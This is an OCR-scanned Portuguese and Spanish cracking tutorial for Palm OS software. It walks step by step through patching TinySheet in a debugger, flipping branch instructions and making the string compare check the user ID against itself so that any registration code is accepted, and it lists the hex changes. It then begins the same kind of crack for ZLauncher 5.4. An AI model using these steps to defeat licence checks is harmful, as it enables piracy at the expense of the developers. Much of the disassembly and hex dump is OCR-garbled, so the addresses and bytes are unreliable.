AFGES ADDOQ.W 
2AF4EZ ri E ¿0s ERA 

DOSAF4EE ¿Ae CMPT. 1 

DOS2AF4 FS Eo BÉ ENE 
2AF4FS A - BO Zz LEA 
AF4FC 2 ¿DSOFFCE MOVE. r F-SO0!$- 
2FSOOD 2 pase 3D6S0004FFDE MOVE. Ed 120), H-46!l; 
A2¿FS06 - E 41F201FA LEA FSO6!171FA(PC) 
3AFS5DA ¿DSOFFDA MOVE. (AD), Hfdd!lf- 

20004 FFDS MOVE. FA (20), £-40!1< 


show routine infos... 


change memory content 


A0 A4 
DO D4 


[0034F490-003AF6FC]: : 


DOSAF4CE 7001 MOVEO 51, DO 
FIG. 10 


Agora no southDebugger setamos um breakpoint na linha imediatamente anterior a linha que contém o BNE e teclamos F5 (veja FIG. 10). Executamos o programa 
até que ele atinja esse breakpoint. 


'" southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


¡Bl 28 1512 OO 
| disassembler Í register | memory dump | trap stack l breakpoints | 
[main | 


O disassembler 


dechex 


hex 


command 


4EB217C0 
4AZEFFEA 


OCSEOODSFFEd 
6710 

3F 
4EAD 


2001 


41FA01FA 
j ¿DSOFFD4 
DOSAFSOE ATA 3 I004FFDS 


ENE 
MOVE. 1 
JSE 
MOVEO 
ADDO. 1 
ERA 
CHPI 0 
BEO 
MOVE. 1 
JS. 
MOVED 
ADDO.W 
ERA 
CMPI.1 
ENE 
LEA 
MOVE. 
MOVE. 
LEA 
mov 
MOVE. 1 


¿DOSBOC?C 


Breakpolnt 
¿OO3AF4DE setado. 
6AE, -(A7) 


, 
¿FSrAS) 


¿DOSGAFEFA 


10126) 


$31, DO 


” 


(AD), $-SDIG- 


FFA4 AD), H-46 15 


FSDEINSLÍFALPO), 


ñ0 


DO 


[0034F490-003AF6FC]: 


DOS2F4CE 7001 MOVEGO $1, DO 


FIG. 11 


waiting for breakpoint... 


= southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


E ¡2 
JB (4 CA (518 
— disassembler | | register | memory dump | | trap stack | | breakpoints 
[ main | 
O disassembler 
dechex v | DOSAFABA 
address ascii | hex command 
3AF4BA N.-.. 4EBA17CO JSR £60s80 131700 ¿DOSBOC7C 
AF4BE Das 4AZEFFEA TST.E $ 1$-161(26) 
AF4C4a f. 66 ENE fl6 13 - ; 
AFACE ade MOVE 1 activate breakpoint 
A F4CA Nm... JS. deactivate breakpoint 
3AF4CE p- HOVEO remove breakpoint 
AF4DO TO 544F ADDO-1 
DOGAF4DZ ee EDO00zz0 EPA go until 
AF4DE Ms ( EOOOSFFE4 CMPI. 0% set next command 
AF 4DO q. BEN EN 
A - ñ show routine infos... 
DO3AF4DE 74. ] MOVE 11 
3AF4EZ N... 4EADFS08 JSP new memory dump window 
3AF4E6 p- 7001 MOVEO 
AF4ES TO 544F ADDO-1 
AF4EA 2 208 ERA 
DO3AF4EE Mo CMPI. 1 
DO3AF4Fd Pond ENE 
DO3AF4FS o LEA 
DOSAF4FC =P. 2DSOFFCE MOVE. L 
DO3AFS00 =h.... 3DESD004FFDZ MOVE . 1 
DO3AFS06 Ria 41FADIFA LEA 
DOSAF SORA -P.. 2DS5OFFD4 MOVE. L 
DO3AFSOE A 3D6S0004FFDE MOVE 1 
AO A1 ll A2 A3 | As A5 | 
DO D1 | D2 D3 | D4 D5 | 
[0034F490-003AF6FC]: 
DO32F4c2 504F ADDO.1M $30, A? 


FIG. 12 


A alteracáo mostrada na FIG. 9 é física no .PRC do TinySheet. Para alterarmos o byte no southDebugger e acompanhar a execucáo, basta clicar com o botáo 
direito do mouse sobre o BNE e o pop-up da FIG. 12 aparece. Clique em “change memory content” e altere de 66 para 67 (veja FIG. 13). 


= southDebugger v1.7 - UNREGISTERED 
File Execution Window Tools Plugins Help 


A CE Es e OO 


] disassembler : 


A IE 


address ascii command notes 
DO3AF4BA $6080!/$17C0 ¿O03B0C7C 


DOSAF4BE $-22!17$-16(246) 
DO3SAF4CZ 
DO3GAF4C4 
DO3GAF4C6 
DOSAF4CA 
DOSAF4CE 
DOSAF4DO 
DOSAF4DZ 
DOSAF4DE 
DOGAF4DC 
DOSAF4DE 
DOSAF4EZ 
DOSAF4E6 
DOSAF4ES 
DOSAF4EA 


TN JSR 
4AZEFFEA TST.B 


6610 
3F3CZ6AE 
4EADF3083 
7001 
544F 
60000220 
OC6EDOOSFF 
6710 
3F3C26B0 
4EADF308 
7001 
544F 
£00002083 


$16!$10 ¿O03A4F4D6 
$9902!/$26AFE, -(A7) 
$-2040!$-7FS(A5) 
$$1, DO 

$32, A7 


E change memory content 


Enter hex values. 


6 7 0 
aaa 


DOSAF4EE 
DOGAF4F4 
DOSAF4FS 
DOSAF4FC 
DOSAFS500 
DO3GAFS506 
DOSAFSOA 
DOSAFSOE 


OC6EDO1S5FFFS 
£6000080 
41FA0202 
ZDS5OFFCE 
3DESOODD4FFDZ 
41FAOIFA 
ZDS5OFFD4 
3D6S0004FFDS 


ñ0 | ñ1 | 2 | A3 | ña | A5 | A6 | A7 | 
DO | D1 | D2 | D3 | D4 | D5 | D6 | D7 | UsSpP | 
ra ___________—_—————— AS 


DO3AF4C2 504F 


3 Iniciar 


2 
” , 


> 


ADDQ.%W $8, A? 


Uh Patcheand... Palm 050 ... 


É2 southDebu... 


$211$15, $i-2(26) 
$128!$80 ¿O03AF576 
$514!$202 (PC), AO 
(A0), $-SO!$-3Z(A6) 
FF4 (AD), H-4G1$-ZE(AG) 
$506! $1FA(PC), AO 
(AD), f-4413-20(A6) 
$FS4(A0), $-40!$-2Z8(A6) 


PC 


BP» Y 01:34 


ml southDebu.. Preedit 


FIG. 13 


= southDebugger v1.7 - UNREGISTERED CTE WE 


File Execution Window Tools Plugins Help 


Be 28 (1218 OO 
| disassembler | register | memory dump | trap stack l breakpoints | 
main | 


| disassembler 


dec/hex 


he cornimarid 
SEBA17CO JSP Fs60s80!/717C0 ¿DOSBOC?C 
e alterado de 4AZEFFEA STE $-22!$-16(A6) 
BNE para BEOQ) 50: ADDO.W_ $ 

, BEN 
o : 226. 73 MOVE. 
DO3AF4CA do. 4EADFSOS ESR 
DOBAFACE 5 2001 MOVEO 


DO3SAF4DO Ñ EE ¿DD 
DO3SAF4DE A égo0000z2Z0 EPA 


DOSAF4DE amy 5 5] - CHPT. 1 


MOVE. 
JS. K-2040!/$-7FS1(25) 
MOVEO $31, DO 
ADDO. 1 . 
Die 8 EPA 
32F4EE 2 - A CHPT. 1 
003AF4F4 PAR 66 EME 
; LEA 
2DSOFFCE MOVE. (20), 
3D680004FFDZ MOVE. 1 R74120), 
41FAO1FA LEA ESO !IF1FA(PC) 
SOFFD4 MOVE. (AD), Hdd!é 
3D680004FFDS MOVE. 1 Esa (20), H-40!5 


A2 A4 


[0034F490-003AF6FC]: 


JOSAF4D6 OCGEDODSFFEA CMPI.W $58, H-28!15-1C[26) [=890] 
FIG. 14 


Agora teclamos F8. A execucáo do programa “pulou” para a linha 0O3AF4D6 e náo executou a Talt. Entretanto isso náo é o suficiente para burlar o registro do 


programa. Após várias tentativas chegamos aos seguintes passos para registrar o TinySheet com qualquer registro. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


TB] ce (518) 09 
— disassembler register | memory dump | trap stack l breakpoints | 


[ main | 


O disassembler 


dec'hex 


| cominand 
4EBA17C0 JSR Fs60s0!717C0 ¿DOSBOC?C 
4AZEFFEA TST.E $-221$-16(A6) 
ADDQ.WO- $38, A7? 
BEÚ gle!lgl10 ¿OO3AFaDE ] 
E 326. MOVE.Wo 9902 /1326AE, -(47) Py Enter hex values. 
2F4CA To JSR $-2040!$-7FS(25) 
o. 7001 MOVEO fil, DO 
AF4DO 544F ADDOQ.W 7 Cancel 
AF4DZ ME ERA $S5441; 
3AF4DE E A 3 CMPI.V 


change memory content 


16610 


3A4F4DE 76. 3 MOVE . 1 9904 !1726B0 

3AF4EZ - ¡E 4E2ADFSOS JSR f-2040!$-79F312 

2AF4ES «A 2001 MOVEO $731, DO 

AF4ES E ADDO. $32, A7? 

2F4E2 OS BRA FS20!17208 ¿OOSAFEFA 

AF4EE o CMHPTI.1 $21!17$15, £?-5126) 

¿F4F4 E ENE $128 !17580 ¿OO3SAFS7?6 A Veja FIG. 16| 
2F4Fo Bo 41FA0202 LEA FS514! 15202 1PC), AO 
2AF4FC Su ¿DSOFFCE MOVE. (20), $-SO!F-32 (246) 
2FSO0D «E 3D6SD004FFDE MOVE. 1 $34 120), H-46!¿-2E(26) 
3AFS506 A 41FA01FA LEA FSOBG!I71FA(PC), AO 
2AFSOA PS ¿DSOFFD4 MOVE. (20), $-44!7-2C[(26) 
3AFSOE e E 3D6SD0004FFDS MOVE . 1 74120) f-40!17-28 1246) 


r 


AO A2 I l As | AS 
[l ll D4 I D5 


DO3AF4DC 6710 BEO F16!5$10 ¿DOOSAF4EE [condition: FALSE] 


¡s Iniciar í [>] (Y Patcheand... = Palm OS ... £5 southDebu... "E couthDebu... 5 :sPreedit 


FIG. 15 
Executar o mesmo procedimento descrito na FIG. 12 e alterar o byte 67 para 66 (este caso é o oposto ao anterior). 


Depois de alterado, tecle F8 e a execucáo irá para a linha OOAF4EE. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


Bee 6 818 OO 
— disassembler register | memory dump I trap stack l breakpoints | 


[ main | 


O disassembler 


dec/hex 


address £ command 


MOVED 
Ao alterarmos de ADDO_ Y 


MBNEparaBEQO -— IN ERA 


A $ ¿220 ¿OO3AFEF4 
8 fluxo da execucáo é OCSEDOOSFFE4 CMPI.Wo $38, f-28!$-10(A6) 
a normal e NAO pula 6610 BNE $161$10 ¿OO3AF4EE 
para 003AF576. 3F3C26B0 MOVE. $3904!526B 


4EADFS0S JSR 3 a 16 7po0080 


Pp. 7001 MOVEO 
ADDO.W  $$2, A7 Cancel 


éecooozos ERA 32 ¿¡OOSAFE 
OC6EDOlLSFFFS CHPI. 1 


Enter hex values. 


41F20202 
E¿DSOFFCE MOVE. 
30004FFDZ MOVE. Ra 120), 
41FAO1FA LEA FSO6GIF1FA(PC), 
¿DSOFFD4 MOVE. (40), 
E MOVE. $4 (20), £-40! 
MOVE. $35, - (47) 
PEA $-21!$-15(26) 
436EFFD4 PEA 
4E4F2A2CE TPAP 
72800 MOVEO $30, D4 
4FEFOOOS LEA F10!/752A 127) 


£2 24 


Ma pinosa ¿cromo haa A “4s7Oolear Mulata E -i-d Y | IA EN AS mit 7 


D0032F4F4 66000080 BNE 128/5380 ¿OD32F576 [condition: TRUE] 


¿eo (Y Patcheand... — Palm OSO ... southDebu. .. E SouthDebu... > 6% Pl 2 01:36 


¿4 Iniciar 


s 5 Preedit 


FIG. 16 


Na FIG. 16 devemos alterar o BNE para BEQ conforme já visto. 


Depois de alterado, teclamos F8 até atingir o ponto da FIG. 18. 


3 é Prcedit - [code0006.s] 
e File Edit View Tools Window Help - 0 X 


TinySheet4 patched pre | RCP | codeD003.s codeD00D4 +1 caode0005.s/ code0001.s | codeb002 codeDO006.s 


3 


HE 4] 


[+ 


Resources 


3 Forms 
23 Alerts 
Ey Strings 
EJ DataD 
EY deb 

EJ Keywords 
23 Changes 


QC] Search Results 


eS | 


Oib?e 7001 HOVEO 
01Rs0 5449f ¿ADDO.W 
éoooo20s ERA 

L264 CHPI.VW 


$1,DOo A 


17? 


B2,47 


L254 


H21/$15,-S[26) 


Alterar BNE para [BNE 
BEQ. O fluxo deve paa 
seguir conforme HONE SL 


. I d MOVE .W 
CEXIELETOA A 


MOVE. L 
MOVE. U 
MOVE. Y 
PELA 
PEA 
TRAP 
MOVEO 
LEA 
ERA 


0190 
01594 
0195 
Dlb9e 
Dlhaz 
Dibab 
Dlhbac 
010 
01bb4 
Dibbs 
Olhbce 
Olbhe 
Dibe2 


Dibc4 q41eeffd4 LEA 
Dibcs 11304000 MOVE .B 


Diberae 
01bd0 ; ffda4 
0104 11504000 
Olhbas 5244 
Dlbda 549f ADDO.V 
Dibdac D0c440005 - CMPI.V 
Dibeo dez BLT 
Dibez q4oabefice PEA 
Dibeb qebadz94 JSR 
Dibea q4oabefice PEA 
Dibee q4abefíd4 PEA 
D1bf2 q4e4faDco TRAP 
Dibfó6 4340 TST.U 
01ibfs q4fefóonbO0c LEA 

o 1h tc 6710 BEO 


Hb 
a 
0) 
a 
p 
a 
r 


JSR 
LEA 
MOVE.B 
ADDQ.V 


Rm 
1 
10 


Hu 


) 
00 0006.00. 0 0.:0:0 00 0:0:0.0:060 0-00 0.0.0. 0"0.0.0 0-00 0 0.0 


0000000000000 00:00 0.0 000 000.000.000 000000 


L255,40 
(201 ,-50116) 
4120) ,-46/[16] 
L256,40 
(20) ,-44 126) 
4140) ,-40116) 


DS 
$S5,- 1147] 


-494 (26) ,40 
01240,D4.WM) ,- 147) 
L257 

-49 (26) ,40 
DO,O(210,D4.1) 
$1,D4 

H2,A7 

E5,D4 

L265 

-50/(46) 


L295 


$15,5$4008 = sysTrap5trCompare 


DO 


INS 


Ln 2287, € 


PP... o. 


¡3 Iniciar e O ” Ulpatcheand... | Palm OSG ... £5 southDebu... BE couthDebu... ¿5 Preedit SE>- Bel 01:92 


FIG. 17 


Veja no preEdit o mesmo código da FIG. 16. 


A execucáo estava em L264 e encontrou abaixo um BNE L267. Ao alterarmos de BNE para BEQ ele náo pula para L267 e continua sua execucáo nas próximas 
instrucóes até atingir o BRA L266. 


A linha que tem o label L266 é CMPI.W 45,D4 veja na FIG. 18. 


'" southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


nee 0 51 OO 
| disassembler | register | memory dump | trap stack | breakpoints 
[main | 


| disassembler 


dechex 


ascii hex command 
DO3AF540 Linha L266 no 52d4 2D. 


DO3AFS42 , ADDAQ.W 
preEdit. CMHPI 0 


0c440005 


DO3AFS48 1. £6DEZ ELT 30!3-1E ¿DOSAFSZC 
0O3AFS54A Hn. . 436EFFCE PEA 5 
DO3AF54E MN... 4EB20294 JS. 6 
OOSAFsS5Z Hn.. 4S6EFFCE PEA 

3 Hr. . 436EFFD4 PEZ 

NO.. 4E4FA0CS TRAP [sysTrapStrCompare] 

DOSAFSSE JT 4240 TST.W 
DOSAFS60 O... 4FEFOGOC LEA 
DOO3AFS56d g- BED ¿OO3AFS7TE 
DO3AFs66 PE. MOVE. Y (A7) 
OOSAFS6A N... JSE 51 
DOSAFS6E Pp. 7001 MOVEO 
DO3AFSs7O TO 544F AaDDO.v 

j ms eoooo1so EPA ¿OOSGAFEFA 
DOOSAFSs7?E N..r 4E2DF77Z JSR 30!17$-58E (25) 


NnrniARC”Ta E DEN WHMTR 1 


GEA e 


AS 


3600 MOVE. W 
A OCSEOOOBFFDE CMPI.W $l11!/5B, f£-34 5-22 126) 
LE tE[ 6628 BNE 228 ¿DO3GAFSAC 
A E oc4asooos CMPI.W 
AFS: 8 BEN 
DOSAFS: (E CMPI.W 
= EI LI A2 A3 ñ4 AS A6 
DO D1 D2 D3 D4 D5 D6 


[0034F490-003AF6FC]: 


DO3AF552 486EFFCE PEA H-50 13-32 (26) [=4390] 
FIG. 18 
Execute teclando F8 até a execucáo atingir a linha que tem a instrugáo PEA +t-50!$-32(A6) [=H*$50] conforme a FIG. 18. 


A instrucáo PEA significa Push Effective Address, ou seja, pega o operando (no caso é A6) e coloca na stack. Neste caso, A6 tem o prefixo -32, isso quer dizer 
que o programa está colocando (Push) na pilha (stack) o valor enderecado por A6-32 (A6 menos 32). 


Abaixo dessa linha temos outro PEA +t-44!$-2C(A6) que igualmente, coloca na pilha o valor enderecado por A6-2C (A6 menos 2C). 


Logo em seguida ele chama a sysTrapStrCompare. Podemos entáo notar que as linhas PEA sáo as strings a serem comparadas pela sysTrapStrCompare. Ele 
coloca as strings na pilha (parámetro) e chama a funcáo (sysTrapStrCompare). 


A primera string está em A6-32 e a segunda string está em A6-2C. Agora abrimos uma “memory dump window” e clicamos em A6. Veja a FIG. 19. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 
IB (| CB 125] O Y 


NOFP 
| disassembler l register - memorydump trap stack | breakpoints 


[main | 


E disassembler 


dechex v lo 034F540 


address ascii hex cominand 
5244 ADDQ.T.- $1, Da 

544F ADDQ.W.O- $32, A7 

00440005 CMPI.WO- $35, Da 

6DEZ BLT $-30!/$-1E ¿OOD3AF520 
4B6EFFCE PEA 
4EBAOZ394 JSR 


436EFFD4 PEA $-44!7-2C(A6) 


OIFA00S [sysTrapStrCompare] 


FS76 
z z 3 AJA PUE Ud 147) 
Ea o Oo 00 00 00 00 _.. Si 
] o Ú 1] 1] o 


34 
05 


J 
on 
a 
AD 


mn - 


E ID 


00 


Dm 
2 Pa 
EN 


to 
a 


B3 
B9 
ES 


an] 
, 
co 
KR 
to 


A 


00 00 
¿Cc 00 0l 
DO 


oO O oo 


hos 


, 


A a] 


LD 


la] 
o 


Sd 


A3 


A 


ODIAFSS52 4B6EFFCE PEA H-50!9-32 (46) [=50] 
FIG. 19 


Na FIG. 19 A6 = 0003B91C. Agora basta calcular: 


-32(A6) = A6 - 32 = 0003B91C — 32 = 3B8EA 


Clicamos novamente em A6, alteramos 0003B91C para 3B8EA e teclamos ENTER. Veja FIG. 20 


southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 
¡8/6 (5/8| CE (215 OO 
memory dump l trap stack | breakpoints 


NOFP 
| disassembler l register 


main | 
| disassembler 


dechex v | 0034F548 


address ascii hex comnariod 
003AF548 m. EDEZ ELT $-3DIF-1E ¿DO3AFSZC 
003AFS54A Hn.. 486 EFFCE PEA $-SO!f-3 
DOSAFS4E PR 4EB20294 JS. $660! 
DOSAFSs5Z Hn.. 436EFFCE PEA $-50! 
DO3AFS56 Hr... 436EFFD4 PEA $ad 1-20 
DOSAFSS5A NO.. 4E4FAOCS TRAP $15!5F, £s 
DOSAFSSE Ja 4440 TST.W DO 
DO3AFS60 0... 4FEFOOOC LEA $l2130 127), A? 


3AFTE4 
(=830] 


J 
601724008 [sysTrapStrCompare] 


| ¿riada ——_— —- th - — AS 
$ E memory dump [30143 o Y - (47) 
! - AS, AS) 
, 
( E 6 13 
MO oO ¿ de ao 00 00 60 Cé6 00 00 [CSF IM.F-——>7. 3AFEFA 
( 00 00 2-00..09 00-00 24 ES biocidas 45) 
ES 08 00 00 


, 
00 

To a 
( 


dí 


A Co G3FIM = user ID da FIG. 2 


LD 


PA di ( 


DOOM 
1D 


to 
[0] 


a 
ñ 


MODOSBSa3A 
MoOcosBadA 


o 
5) 


O] 
SS 


FSCZ 


CN 
mn 


40 í 


A A 


O 10 0 (íám 
( 


» Mm ( 


MO0oOsSES6s 82 Ez 00 RESCZ 


Dm 


MOc0OsSBS7?A AC Dé 00 


ommtdos 
Dow 


, 
e: 


[ DOSB932 3 00 
00 0 


ESCZ 


o 
o ma 
DO 0w 


( 


B 

= 
[2,1 
= 
O, 


Fuma toa 
Ola 
NINE 


JOGAFS52 48bEFFCE PEA BSO! 59-321 


FIG. 20 


Concluímos que o programa gera uma string a partir do código de registro digitado. Essa string deve ser igual ao USER ID calculado pelo programa. 


Depois ele compara o USER ID com a string que ele gerou a partir do código de registro. Se elas forem diferentes, o registro é inválido mas se elas forem iguais, o 
registro é válido. 


Para fazermos ele aceitar qualquer registro basta comparar a string do USER ID com ela mesma. Assim: 


Original (compara strings diferentes) 


PEA 4-50!$-32(A6) [=+t$0] => user ID 
PEA +t-441$-2C(A6) => string calculada conforme registro digitado 


Trap 415!$f, 441160!$A0C8 [sysTrapStrCompare] => Compara user ID com a string calculada 


Comparando a mesma string 


PEA H4-50!$-32(A6) [=+t$0] => User ID 
PEA +-501$-32(A6) => user ID 


Trap 415!$f, 441160!$A0C8 [sysTrapStrCompare] => compara user ID com user ID 


Para alterar o segundo PEA, basta clicar com o botáo direito do mouse sobre ele. No pop-up clique em “change memory content” e altere de D4 para CE. Veja FIG. 


21. 


Após essa alteracáo devemos alterar ainda alguns BEQs e BNEs sunseqúentes. Essas alteracóes sáo mostradas na FIG. 23. 


Na FIG. 24 temos o log do prcEdit. As alteracóes que fizerem devem ser iguais ás das figuras. 


'* southDebugger v1.7 - UNREGISTERED 


¡El (54) CE 


(3 


NOP 


File Execution Window Tools Plugins Help 


Ls 


SS, 


| disassembler | 


[main | 


O disassembler 


dechex 


ascii Hex cominand 
A 41EEFFD4 LEA Hada lz 20 
A 11804000 MOVE.E DO, £%0( 
PD 5244 ADDO..o- $1, Dá 
TO 544F ADDO. $32, A 
lA segunda linha ¿Do 0c440005 CMPI. VW H?5, Da 
" EDEZ ; OOSAFSZ2C 
era 486EFFDA4 e 5 uE Ens des 
4. 486 EFFCE PEA 
alteramos para : , , 
2s JS. 3AF7E4 
¡¿86EFFCE para PEA [=$$0] 
¡ficar igual a DE 67 
¡primeira linha. 4E4FA0CS TEAP f41160/34008 [sysTrapStrCompare] 
¡Comisso 4240 TST.W 
[ comparamos a 4FEFODOC LEAZA 
: 6710 BEO 576 
mesma string. E 
L 2 3F3C26BZ MOVE 1 (27) 
DOZAFSEA 4EADFS0S JSP 5) 
D. 7001 MOVEO $31, DO 
TO 544F ADDGQ.V $> 
E sonoo1s0 BRA $ ¿OOSAFEFS 
N..yY 4EADF77Z JSP $ ! 
6. 3600 MOVE. W DO, D3 
Tn OCSEOOOBFFDE CMPI.Wo  fl11!13B, $-34!13-22 (26) 
gl 6 BENQ $40! ¿OO3AFSAC 
"al nr CUIT IT TT PT 


DOS rasos gl BrZa EEN 


DOSAFSS4 LE oc4sooos CMHPI.W $33, DS 
A0 A1 | A2 A3 24 As A6 
DO D1 D2 D3 D4 D5 D6 


[0034F490-0034F6FC]: 


DO3AFSS52 486EFFCE PEA $-50!$-32(A6) [=$$0] 


FIG. 21 


Thank you for registering 


Inaddition to free online technical 


support, registered Users gre 
entitled to recelve important 


information on Upgrodes, updote:z 
and special offerzl 


FIG. 22 


Ao executarmos o programa o form com a mensagem de registro aceito aparece conforme a FIG. 22. 


EAEEDILS JE sArguivos Le Cit II pate de, prel 


etourtes 


23 Forms 
23 álerts 
33 Strinas 
39 Data 
33 deb 

23 Keywords 
33 Changes 


10x37D90: 


BA ja 


7001 
3F3C 
DOC6E 
PELE 
3D68 
FFD4 


544F 
26B0 
0015 
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584F yeE. ?.yÚUB' NóGixO 
FFFS. ".B'N-=ITO0.n..yoe 
1F3C gD.n..ybg.?.yl 
. N24.XO” 


4EAD 
4E4F =ITO.|..607<%IN0 


J0x37DA0: 
JOxX37DBO: 
J0x37DCD: 
JOx37DDO: 
JOZ37DEO: 


FFD4 
4000 
4EBA 
4440 
7001 
000B 


1F30 
5244 
0294 


4000 2 D1D2 
544F 0044 0005 
486É FFCE 486E 
4FEF 000€ 6710 S3EF3€ 
544F 6000 0180 4EAD 
J0xR37DFO: FFDE 28 0043 0008 
J0x37E00: 2 0043 000D 672€ 0043 
J0x37E10: 26AF 4EAD F808 7001 544F 
l0x37E20: FFDE 6710 3F3C 26AF 4EAD 
10x37E30: 6000 0134 486E FFDA 4EAD 
J0x37E40: 000B FFDE 584F 6714 302E FFFA BOSE 
J0x37ES50: 6D26 3F3C 26B1 4EAD F808 7001 544F 
1l0x37E60: 0106 BAGE FFFA 6F10 3F30 26B1 4EAD 
10x37E70: 7001 544F 6000 O0F0 0C6E O00B FEFDE 
l0x37E80: 3F2E FFDA 2F0A 4EBA FADS 504F 6008 
10x37E90: 4EAD F78A 584F 422D EADB 422D EADA 
J0x37EA0: 0001 FFDC 6736 OC6É 000B FFDE 6710 
JOx37EBO0: FFDA 1F30 0001 4EBA FBO2 584F 6004 
J0x37EC0: 0001 4EAD F790 544F 1870 0001 EAD9 
J0x37EDO: 0001 EADC 387€ O00E EADE 601E OC6E 
0x37EE0: FFDE 660E 3F2E FFDA 4227 4EBA FACE 
l0x37EFO: 6008 4227 4EAD F790 544F OC6É 0015 
J0x37F00: 6744 OC6E O00B FFDE 6710 3F2E FFDA 
JOx37F10: 4EBA FED6 5584F 6004 1F3€ 0001 
10x37F20: F796 544F 187€ 0001 EAD8 


41EE FFD4 
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0043 
DOOB 6726 
6000 0144 
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FIG. 23 


A FIG. 23 mostra TODAS as alteracóes de devem ser feitas no .PRC para que ele aceite qualquer registro. 
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12 code0006. 


13 codeDO0O0é6. 


14 codeo000é6. 


15 codeo0006 


E] Strings 4 code0006. 
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Ss codeb000b6. 


Y codeD0D6. 
2 coded0o06. 


2 code000é6. 


oo00niBSse 
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ooooicóc 
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Dooo1icca 
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00D1D26 


¿DOOO1DZE 


O log do prcEdit mostra todas as alteracóes efetuadas. 
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()Serial (X)HotSync/Code ()Trial ()Multiprotección ()Encriptado (X)Otro 
Aplicación que da el aspecto de Windows XP, ó MacOs en la Palm 


Registrarse con cualquier número incorrecto 
(X)NewBies ( )Intermedio ()Avanzado ()Master ( )Gúru 
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Palm CRACKER: Post_nubilaOyahoo.com.br | FECHA: M/18/Julio/2006 


INTRODUCCION 
Como patchear o Zlauncher 5.4 (portugues TUTOR) 


TUTORIAL EN ESPAÑOL 
Como parchar Zlauncher 5.4 Build 060220 y ZLauncher v5.41 Build 060417 


III BUSCAMOS QUIEN TRADUSCA A OTROS 


Register 
Register ZLauncher at Register ZLauncher at 
www.PalmGear.com/register www.PalrmGear.com?/register 


Enter Product ID: 43812 Enter Product ID: 43812 
- T ars ds d “ou hawe 0D days left to try for free ou have 0D doys left to try for free 
ted User Name (HotSyncID) [HE ]| JUuser Name (HotSync ID) [ 


A The free trial of Compaq 
ZLauncher expired, 
Please register Registration Code (XX) Invalid registration 
ZLauncher. 12345678 code! 


Register failed 


Continue Trial [ Register ] [ Continue Trial ) 


O Zlauncher exibe uma mensagem de erro ao digitar um número de registro inválido. Essa mensagem de erro é exibida em uma janela chamada Talt. É como um 
MessageBox do Visual Basic, ou seja, ela é modal (fica sempre a frente até que se clique em Ok ou Listo). Veja figura 1. 


Vamos abrir o Zlauncher.prc no programa chamado PRCExplorer e procurar pela Talt que exibe a mensagem de erro. Veja figura 2. 


Zlauncher muestra un mensaje de error al registrar incorrectamente, ese mensaje es una llamada a una Talt, es como un mensaje llamado desde Visual 
Basic, Osea un mensaje modal, (Esto indica que se eliminara el mensaje hasta presionemos Ok Listo), Ver Figura 1 


Registrar 
Para registrar y obtener la 
versión completa, visite a 
www handango.com-purchase 
e ingrese 42086. 
Tiene 30días que quedon pora pra 


Nombre de Usuario (HotSÍ HE ) 


Fallo de Registro 


Xx] Codigo de Registro 
Inválido! 


[ Listo ] 


Figura 1 


Abrimos Zlauncher.prc con un programa llamdo PRCExplorer y en este mismo buscamos el mensaje desde el listado del mensajes de error de Talt 
disponibles. Ver figura 2. 


ZLauncher_Spanish.pre - Palm Application Explorer 
File Edit view Help 


=> El Y LJ 

= 2Launcher_Spanish.pre 
+ ARMC 1) 
+ CBar (1) a 
+ MBAR (2) Fallo de Registro 
+ NENT (1) 
lb Codigo de Registro 
+ SmrT (1) PA 
- Talt (84) Invalido! 


1000 ( 


Resource size: 61 bytes File offset: Ox? 6EB2 [503474] 


" 


"Listo | 


Figura 2 


Veja na figura 2 a Talt que exibe a mensagem de erro. O número que identifica essa Talt no programa é 1002 (0x03ea). 


Agora vamos procurar esse número no Zlauncher.prc usando o programa PRCEdit. Veja figura 3. 
Ahora vemos la Figura 2 una Talt que muestra el mensaje de error, El numero de Talt identificada por el error es la Talt 1002 (0x03ea). 


Ahora buscamos ese número de Talt directamente abriendo el archivo victima Zlauncher.prc usando para nuestro objetivo el programa PRCEdit. Ver 
figura 3. 


A QOEX)] 


ES File Edit Yiew Tools Window Help - a 
¿lLauncher_Spanish.patched. pri | REP | codeD007.s  code0D05.s | code0008.s | codeD007. s| codeDÓ0: 
= HE Resources A 2745 00002 1bc MOVE . 0 
+23 Forms 3 46 00002 1he MOVE.L 
e ” DODOZ21cO TRAP yaTrapFrmGetóObje 
1000 Período de prueba vencid: 00002104 MOVEA.L 
1001 Registro Exitoso! 2 000021c6 MOVE . W 
1002 Fallo de Registro sa 000021c8 MOVE. L 
2] Referenc 00002 1ca 4e4fal79 TRIP sysTrapFrmóetFocu 
SÁ A MOVE. L 
9 00006948 0000210 q4e4fal39 TRAP ysTrapF ldGetTex 
- = 4 pono0z1d4 2445 MOVEA.L 
++ 1004 HotSync 1D  DODOZ21dó 2fla MOVE .L 2 
++ 1010 Systema Incompatible 2756 00002 1d8 4deadi5be JSR -2 706115) 
+ + 1020 Sin Espacio Suficiente 2 00002 1d 4a00 TST.B 
+ + 1030 Error 2758 00002 4fefODla LEA [17] ,147 
+ + 1040 Tema instalado no disponit 2 6740 EEG L263 
+ + 1050 Tema no disponible == 2 00002 1e4 206dcb00 MOVEA.L -13568/(45),40 
+ + 1060 Fondo no disponible 2 Do0o0z21es 10bc0001 MOVE.B  fH1,(20) 
++ 1070 Log de Error 2762 DOOO021ec 42a80002 CLR.L 2140) 
+ + 1100 Nombre de Pestaña Errome 2763 DO0O021f0 2f0a MOVE.L  2A2,-147) 
+ + 1110 Borrar Pestaña 2 apura 1f2 45 perdida PEA 61140) 
+ + 1120 Borrar Pestaña 2 Don2 q4e4falc TRAP $15,$40C05 = sysTrap3trCopy 
+ + 1130 Pestaña de Transmisión 2 1£3co0001 MOVE.B  H1,-(247) 
+ 1150 Mezclar Pestañas 3f3cóble MOVE. H258!$1c,-(27) 
+ 1160 Copiar todas DB: a la Tarj 2 MOVE.L  -13568(245),-(147) 
+ 1170 Copiar todos los archivos e 2 MOVE.L E 71 6646145 !'$fe0001,- (17) 
+ + 1200 Sobrescrbir Archiv 2 MOVE .L 195440c4352,- (17) 
+ + 1210 Sobrescribir Base de Dato: ; TRAP sysTrapPrefS3etipp 
